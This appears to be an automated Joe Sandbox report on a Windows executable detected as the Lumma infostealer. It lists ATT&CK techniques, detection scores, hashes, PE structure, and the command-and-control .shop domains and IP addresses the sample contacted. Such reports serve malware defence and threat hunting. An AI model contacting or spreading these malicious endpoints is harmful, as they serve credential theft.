                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items131
                    Virtualization/Sandbox Evasion
                    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
                    Process Injection
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe66%VirustotalBrowse
                    SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe78%ReversingLabsWin32.Spyware.Lummastealer
                    SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe100%AviraDR/AVI.Agent.cpqcd
                    SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll0%VirustotalBrowse
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    slamcopynammeks.shop1%VirustotalBrowse
                    fp2e7a.wpc.phicdn.net0%VirustotalBrowse
                    windowsupdatebg.s.llnwi.net0%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                    https://sectigo.com/CPS00%URL Reputationsafe
                    http://ocsp.sectigo.com00%URL Reputationsafe
                    http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                    https://system.data.sqlite.org/0%URL Reputationsafe
                    slamcopynammeks.shop0%Avira URL Cloudsafe
                    employhabragaomlsp.shop0%Avira URL Cloudsafe
                    roomabolishsnifftwk.shop0%Avira URL Cloudsafe
                    https://slamcopynammeks.shop/CT0%Avira URL Cloudsafe
                    https://www.sqlite.org/lang_aggfunc.html0%Avira URL Cloudsafe
                    employhabragaomlsp.shop12%VirustotalBrowse
                    femininiespywageg.shop0%Avira URL Cloudsafe
                    slamcopynammeks.shop1%VirustotalBrowse
                    roomabolishsnifftwk.shop12%VirustotalBrowse
                    https://www.security.us.panasonic.com0%Avira URL Cloudsafe
                    https://www.sqlite.org/lang_aggfunc.html0%VirustotalBrowse
                    https://slamcopynammeks.shop/C0%Avira URL Cloudsafe
                    averageaattractiionsl.shop0%Avira URL Cloudsafe
                    https://slamcopynammeks.shop/0%Avira URL Cloudsafe
                    civilianurinedtsraov.shop0%Avira URL Cloudsafe
                    https://slamcopynammeks.shop:443/api0%Avira URL Cloudsafe
                    https://www.sqlite.org/lang_corefunc.html0%Avira URL Cloudsafe
                    civilianurinedtsraov.shop12%VirustotalBrowse
                    averageaattractiionsl.shop11%VirustotalBrowse
                    https://slamcopynammeks.shop/api0%Avira URL Cloudsafe
                    https://slamcopynammeks.shop:443/api9%VirustotalBrowse
                    https://www.sqlite.org/lang_corefunc.html0%VirustotalBrowse
                    https://www.security.us.panasonic.com0%VirustotalBrowse
                    museumtespaceorsp.shop0%Avira URL Cloudsafe
                    stalfbaclcalorieeis.shop0%Avira URL Cloudsafe
                    https://slamcopynammeks.shop/0%VirustotalBrowse
                    buttockdecarderwiso.shop0%Avira URL Cloudsafe
                    https://slamcopynammeks.shop/api9%VirustotalBrowse
                    stalfbaclcalorieeis.shop11%VirustotalBrowse
                    femininiespywageg.shop13%VirustotalBrowse
                    buttockdecarderwiso.shop12%VirustotalBrowse
                    museumtespaceorsp.shop11%VirustotalBrowse
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    slamcopynammeks.shop
                    104.21.12.112
                    truetrueunknown
                    fp2e7a.wpc.phicdn.net
                    192.229.221.95
                    truefalseunknown
                    windowsupdatebg.s.llnwi.net
                    87.248.204.0
                    truefalseunknown
                    NameMaliciousAntivirus DetectionReputation
                    employhabragaomlsp.shoptrue
                    • 12%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    slamcopynammeks.shoptrue
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    roomabolishsnifftwk.shoptrue
                    • 12%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    femininiespywageg.shoptrue
                    • 13%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    averageaattractiionsl.shoptrue
                    • 11%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    civilianurinedtsraov.shoptrue
                    • 12%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://slamcopynammeks.shop/apitrue
                    • 9%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    museumtespaceorsp.shoptrue
                    • 11%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    stalfbaclcalorieeis.shoptrue
                    • 11%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    buttockdecarderwiso.shoptrue
                    • 12%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tSecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exefalse
                    • URL Reputation: safe
                    unknown
                    https://slamcopynammeks.shop/CTMSBuild.exe, 00000002.00000002.2115916035.0000000001049000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://sectigo.com/CPS0SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exefalse
                    • URL Reputation: safe
                    unknown
                    http://ocsp.sectigo.com0SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exefalse
                    • URL Reputation: safe
                    unknown
                    https://www.sqlite.org/lang_aggfunc.htmlSecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exefalse
                    • URL Reputation: safe
                    unknown
                    https://www.security.us.panasonic.comSecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://slamcopynammeks.shop/CMSBuild.exe, 00000002.00000002.2115916035.0000000001049000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://slamcopynammeks.shop/MSBuild.exe, 00000002.00000002.2115916035.0000000001049000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://slamcopynammeks.shop:443/apiMSBuild.exe, 00000002.00000002.2115916035.0000000000FEF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 9%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.sqlite.org/lang_corefunc.htmlSecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://system.data.sqlite.org/SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    104.21.12.112
                    slamcopynammeks.shopUnited States
                    13335CLOUDFLARENETUStrue
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1447065
                    Start date and time:2024-05-24 10:25:15 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 5m 12s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:4
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@3/2@1/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 93%
                    • Number of executed functions: 112
                    • Number of non-executed functions: 204
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Stop behavior analysis, all processes terminated
                    • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                    • Excluded IPs from analysis (whitelisted): 20.12.23.50, 87.248.204.0, 192.229.221.95
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ocsp.edge.digicert.com, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    TimeTypeDescription
                    04:25:59API Interceptor1x Sleep call for process: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe modified
                    04:26:02API Interceptor6x Sleep call for process: MSBuild.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    104.21.12.112V3sheMFqZp.exeGet hashmaliciousLummaCBrowse
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      slamcopynammeks.shopV3sheMFqZp.exeGet hashmaliciousLummaCBrowse
                      • 104.21.12.112
                      fp2e7a.wpc.phicdn.nethttp://18.158.249.75Get hashmaliciousUnknownBrowse
                      • 192.229.221.95
                      BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                      • 192.229.221.95
                      https://perspectivefunnel.co/664fc385b6e1a200142f71ee/664fc45e205ea60014803d49/Get hashmaliciousUnknownBrowse
                      • 192.229.221.95
                      https://pub-a2527e0fc1774b399011ecd14755d452.r2.dev/0nlinedoc.htmlGet hashmaliciousHTMLPhisherBrowse
                      • 192.229.221.95
                      run.jsGet hashmaliciousUnknownBrowse
                      • 192.229.221.95
                      http://qyt8pi.krestologs.comGet hashmaliciousUnknownBrowse
                      • 192.229.221.95
                      SecuriteInfo.com.PUA.Tool.RemoteControl.18.25736.20264.exeGet hashmaliciousRMSRemoteAdminBrowse
                      • 192.229.221.95
                      SecuriteInfo.com.PUA.Tool.RemoteControl.18.25736.20264.exeGet hashmaliciousRMSRemoteAdminBrowse
                      • 192.229.221.95
                      http://birchflarechurch.comGet hashmaliciousUnknownBrowse
                      • 192.229.221.95
                      nF54KOU30R.exeGet hashmaliciousRHADAMANTHYSBrowse
                      • 192.229.221.95
                      windowsupdatebg.s.llnwi.nethttps://in.xero.com/7hv8mDuF13K6MICiXjOmyJk92EdbNVBSqtgAvYsVGet hashmaliciousUnknownBrowse
                      • 87.248.204.0
                      https://new.aj848310310.workers.dev/Get hashmaliciousUnknownBrowse
                      • 178.79.208.1
                      http://bdrive-document-review.com/Get hashmaliciousHTMLPhisherBrowse
                      • 87.248.205.0
                      https://pub-e075ab4e149d4f35814a7b43f741bb9d.r2.dev/verify.htmlGet hashmaliciousHTMLPhisherBrowse
                      • 46.228.146.0
                      57b74aeb-14c0-4eca-b326-c8b852dc526d.jsGet hashmaliciousUnknownBrowse
                      • 95.140.236.128
                      https://neuraxpharm.eurosbiolab.eu/?__cf_chl_rt_tk=TES3LKGEhjH1G5Ym.iTFDxwaSWwxOocOm2ySKfq7pJU-1716481117-0.0.1.1-1621Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                      • 87.248.204.0
                      https://github.com/ustaxes/UsTaxes/files/15378217/All.2023.Tax.Documents.zipGet hashmaliciousUnknownBrowse
                      • 87.248.205.0
                      https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:90c503cb-cf61-4be1-b108-1df5bcac434aGet hashmaliciousUnknownBrowse
                      • 178.79.238.0
                      SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exeGet hashmaliciousAsyncRAT, DcRat, StormKitty, VenomRATBrowse
                      • 87.248.204.0
                      http://x6-1f3.pages.dev/appeal_case_ID/Get hashmaliciousUnknownBrowse
                      • 87.248.205.0
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      CLOUDFLARENETUSWaGiUWSpyO.exeGet hashmaliciousLummaC, RisePro StealerBrowse
                      • 104.26.4.15
                      ufvxGe0K5E.exeGet hashmaliciousLummaC, RisePro StealerBrowse
                      • 104.26.5.15
                      eoZWxnJJyo.exeGet hashmaliciousLummaC, RisePro StealerBrowse
                      • 104.26.4.15
                      BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                      • 188.114.96.3
                      https://auth-logservicekmfjnslepiuruamnbvoaprjlpwrjworsds.tropicalsce.com/Get hashmaliciousUnknownBrowse
                      • 104.17.25.14
                      https://topnewsz66.com/super-bowl-includes-ads-about-jesus-as-part-of-multi-million-dollar-he-gets-us-campaign/Get hashmaliciousUnknownBrowse
                      • 104.17.2.184
                      https://deref-mail.com/mail/client/j_iGygdK9BI/dereferrer/?redirectUrl=Get hashmaliciousUnknownBrowse
                      • 172.67.40.173
                      Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
                      • 188.114.97.3
                      documentos.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                      • 104.17.64.14
                      sample.htmlGet hashmaliciousHTMLPhisherBrowse
                      • 104.21.78.175
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      a0e9f5d64349fb13191bc781f81f42e1WaGiUWSpyO.exeGet hashmaliciousLummaC, RisePro StealerBrowse
                      • 104.21.12.112
                      ufvxGe0K5E.exeGet hashmaliciousLummaC, RisePro StealerBrowse
                      • 104.21.12.112
                      eoZWxnJJyo.exeGet hashmaliciousLummaC, RisePro StealerBrowse
                      • 104.21.12.112
                      BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                      • 104.21.12.112
                      Nisan Temlik #U00f6demeleri Hk.exeGet hashmaliciousDBatLoaderBrowse
                      • 104.21.12.112
                      OjTT5RzE3n.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                      • 104.21.12.112
                      Payment For order details .exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, zgRATBrowse
                      • 104.21.12.112
                      Nisan Temlik #U00f6demeleri Hk.exeGet hashmaliciousDBatLoaderBrowse
                      • 104.21.12.112
                      Items.xlsGet hashmaliciousUnknownBrowse
                      • 104.21.12.112
                      SecuriteInfo.com.W32.ABRisk.VTZE-2830.26480.4550.exeGet hashmaliciousUnknownBrowse
                      • 104.21.12.112
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\Users\user\AppData\Local\Temp\Protect544cd51a.dllBI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                        file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                          t0R4HiIJp7.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                            file.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                              file.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                3108_FreeDownloadFiles.zipGet hashmaliciousPureLog Stealer, VidarBrowse
                                  file.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                    dehdsDiT1p.exeGet hashmaliciousLummaC, PureLog Stealer, Xmrig, zgRATBrowse
                                      SecuriteInfo.com.Trojan.Siggen28.47309.32751.2518.exeGet hashmaliciousCryptOne, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, Stealc, VidarBrowse
                                        file.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):522
                                          Entropy (8bit):5.358731107079437
                                          Encrypted:false
                                          SSDEEP:12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
                                          MD5:93E4C46884CB6EE7CDCC4AACE78CDFAC
                                          SHA1:29B12D9409BA9AFE4C949F02F7D232233C0B5228
                                          SHA-256:2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
                                          SHA-512:E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):760320
                                          Entropy (8bit):6.561572491684602
                                          Encrypted:false
                                          SSDEEP:12288:wCMz4nuvURpZ4jR1b2Ag+dQMWCD8iN2+OeO+OeNhBBhhBBgoo+A1AW8JwkaCZ+36:wCs4uvW4jfb2K90oo+C8JwUZc0
                                          MD5:544CD51A596619B78E9B54B70088307D
                                          SHA1:4769DDD2DBC1DC44B758964ED0BD231B85880B65
                                          SHA-256:DFCE2D4D06DE6452998B3C5B2DC33EAA6DB2BD37810D04E3D02DC931887CFDDD
                                          SHA-512:F56D8B81022BB132D40AA78596DA39B5C212D13B84B5C7D2C576BBF403924F1D22E750DE3B09D1BE30AEA359F1B72C5043B19685FC9BF06D8040BFEE16B17719
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                          Joe Sandbox View:
                                          • Filename: BI6oo9z4In.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: t0R4HiIJp7.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: 3108_FreeDownloadFiles.zip, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: dehdsDiT1p.exe, Detection: malicious, Browse
                                          • Filename: SecuriteInfo.com.Trojan.Siggen28.47309.32751.2518.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          Reputation:moderate, very likely benign file
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v...2...2...2...]...6....f..0...)=..,...)=....;...;...2.~.C...)=..i...)=......)=..3...)=..3...Rich2...........PE..L....#da...........!.....(...n...............@......................................(.....@.............................C.......x................................n...B..................................@............@...............................text....&.......(.................. ..`.rdata......@.......,..............@..@.data...`...........................@....rsrc...............................@..@.reloc..R...........................@..B........................................................................................................................................................................................................................................................................................................................
                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.083469942292286
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.91%
                                          • Win32 Executable (generic) a (10002005/4) 49.86%
                                          • InstallShield setup (43055/19) 0.21%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          File name:SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
                                          File size:4'779'216 bytes
                                          MD5:99bba7a8fb2a5f15924d1673cfe3a72b
                                          SHA1:7c645451ea48d31736f8866781682ef5e192e186
                                          SHA256:52137b032c46dfa0c74ce28eb0610f22c68a22b6fa2481505b9decdb268d7ae2
                                          SHA512:25f380328a3e4ead2b68eaa550398d3df91c9f7cdd04c1d729ffa535ebe6adb3632ab3124737a1db5bef7701e8eeb3af59ef5de35010668ebf8592cd8d728158
                                          SSDEEP:98304:heW3qPy6ZzXRRiBGH+GGaly1PyIhoLE3wTAGR:h1C9hRiBLGdin0Ea
                                          TLSH:F4267B17FE149A20D0080737C2C7561413B4BD492BA2DB9A3E9D67AD2B2335EEDCB275
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................P...C.........n.C.. ....C...@.. ........................H......<I...@................................
                                          Icon Hash:7febeb331f0c8804
                                          Entrypoint:0x83b16e
                                          Entrypoint Section:.text
                                          Digitally signed:true
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0xFEF4998A [Sun Jul 19 10:35:54 2105 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                          Signature Valid:false
                                          Signature Issuer:CN=DigiCert EV Code Signing CA (SHA2), OU=www.digicert.com, O=DigiCert Inc, C=US
                                          Signature Validation Error:The digital signature of the object did not verify
                                          Error Number:-2146869232
                                          Not Before, Not After
                                          • 29/06/2020 02:00:00 22/07/2022 14:00:00
                                          Subject Chain
                                          • CN=Logitech Inc, O=Logitech Inc, L=Newark, S=California, C=US, SERIALNUMBER=C1067879, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US
                                          Version:3
                                          Thumbprint MD5:5FF60D3F0E26681924EBA3961079A9A1
                                          Thumbprint SHA-1:8FA32D538BDF7CF7A56CC415A7C0BDE6D8489D0E
                                          Thumbprint SHA-256:EC91CE23E9467AF8795FD88D75F0834DEA6C2808AC0F2A6241A16B02E0ECA0A5
                                          Serial:08FC2A6C411D88E7253C3D99170EAE62
                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x43b1200x4b.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x43c0000x49cc0.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x48ce480x1e88
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x4860000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000x4391740x439200b78cee7665b8bb60aec54b3fa0aab760unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc0x43c0000x49cc00x49e00f33376d36b5a42d8f8cadf9567658906False0.3551481863367174data5.782790271390884IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0x4860000xc0x2003b1510a2fa4631b450de9ba31bd14a8fFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_CURSOR0x43f8000x134data0.43506493506493504
                                          RT_CURSOR0x43f9340x134data0.3409090909090909
                                          RT_CURSOR0x43fa680x134data0.31493506493506496
                                          RT_CURSOR0x43fb9c0x134data0.23376623376623376
                                          RT_CURSOR0x43fcd00x134data0.23376623376623376
                                          RT_CURSOR0x43fe040x134data0.23376623376623376
                                          RT_CURSOR0x43ff380x134data0.22727272727272727
                                          RT_CURSOR0x44006c0x134data0.3538961038961039
                                          RT_CURSOR0x4401a00x134data0.37337662337662336
                                          RT_CURSOR0x4402d40x134data0.37012987012987014
                                          RT_CURSOR0x4404080x134data0.38961038961038963
                                          RT_CURSOR0x44053c0x134data0.4025974025974026
